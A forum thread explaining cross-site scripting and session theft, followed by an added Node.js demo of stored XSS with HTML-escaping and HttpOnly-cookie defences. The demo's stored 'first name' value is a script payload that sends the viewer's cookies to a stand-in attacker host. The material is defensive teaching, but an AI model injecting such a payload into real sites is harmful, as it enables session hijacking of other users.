cross site scripting

Ranch Hand
Posts: 348
I've been googling about cross site scripting. For now, I understand that it's a form of injecting a malicious script into some input field, which will then be saved into a database. Can anybody show me why this is harmful? Let's say I'm opening a personal information screen to apply for an online shopping website membership, I type some malicious script into the first name field and submit the form. The first name field will then be persisted to the website's database, so where's the harm? I'm still not following. Can anybody please enlighten me on this issue? Thanks.
 
Rancher
Posts: 43081
The harm is not in that script being stored on the server; the harm is in that script being executed when you call up a page that executes it (in your example, that would be a page displaying your first name). But this is a big subject, and many treatises have been written about it; the Security FAQ at https://coderanch.com/how-to/java/SecurityFaq#web-apps points to a couple of them that discuss XSS at length.
 
David Spades
Ranch Hand
Posts: 348
I just found out that cross site scripting can be used to steal your session. How does this work? Does the hacker need to have access to the victim's computer in order for this to work? Thanks.
 
author & internet detective
Posts: 41860
David,
An XSS attack can send your session cookie to the hacker. See this OWASP page for other ways a hacker could steal your session cookie. And the attacker does not need access to the victim's computer for this to work.
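The two answers above, as an added example that is not part of this thread and not code from CodeRanch: a stored "first name" carrying a cookie-stealing script, the page that executes it because it concatenates the value straight into HTML, and the two defences a practitioner would reach for (HTML-encoding on output, and an HttpOnly session cookie so that this particular payload has nothing to read). The member record, the host name attacker.example and the cookie name JSESSIONID are constructed for the demo; it runs under Node.js with no dependencies.

```javascript
// Added example (not from the CodeRanch thread): stored XSS via an unescaped
// "first name" field, the cookie-stealing payload it can carry, and the two
// server-side defences. Runs under Node.js with no dependencies.

// A constructed record, as it might sit in the shop's database after the
// membership form was submitted. The "first name" is the attacker's payload:
// it puts the viewer's cookies into an image request to a host the attacker
// controls (attacker.example is a hypothetical name).
const STORED_MEMBER = {
  id: 42,
  firstName: "<script>new Image().src='https://attacker.example/c?'+document.cookie</script>",
};

// Vulnerable rendering: the stored value is concatenated straight into HTML,
// so the browser of anyone who views this page runs the script. No access to
// the victim's machine is needed; the victim's own browser does the work.
function renderProfileVulnerable(member) {
  return `<p>Welcome back, ${member.firstName}!</p>`;
}

// Fix 1: HTML-encode every untrusted value before it goes into element text.
// These five characters are the ones that can change HTML structure.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

function renderProfileSafe(member) {
  return `<p>Welcome back, ${escapeHtml(member.firstName)}!</p>`;
}

// Crude check used by the demo: does this HTML contain a <script> element
// that a browser would parse and execute? (Entity-encoded text does not.)
function containsExecutableScript(html) {
  return /<script\b[^>]*>[\s\S]*?<\/script>/i.test(html);
}

// Fix 2: even if an XSS bug slips through, an HttpOnly session cookie is not
// exposed through document.cookie, so this payload exfiltrates nothing.
// The attacker can still act as the victim from inside the page, so HttpOnly
// is a second layer, not a replacement for output encoding.
function sessionCookieHeader(sessionId) {
  return `JSESSIONID=${encodeURIComponent(sessionId)}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

// What a page script can read from document.cookie: only cookies that were
// set without the HttpOnly flag. Simulates the browser rule for the demo.
function visibleToScript(setCookieHeaders) {
  return setCookieHeaders
    .filter(h => !/;\s*HttpOnly\b/i.test(h))
    .map(h => h.split(';')[0]);
}

console.log('vulnerable:', renderProfileVulnerable(STORED_MEMBER));
console.log('safe:      ', renderProfileSafe(STORED_MEMBER));
console.log('script runs in vulnerable page:', containsExecutableScript(renderProfileVulnerable(STORED_MEMBER)));
console.log('script runs in safe page:      ', containsExecutableScript(renderProfileSafe(STORED_MEMBER)));
console.log('cookies a page script could steal:', visibleToScript([sessionCookieHeader('abc123'), 'theme=dark; Path=/']));
```

The escaping here is the rule for HTML element text; a value placed inside an attribute, a URL, or a script block needs the encoding for that context instead, which is what the OWASP material linked above goes into.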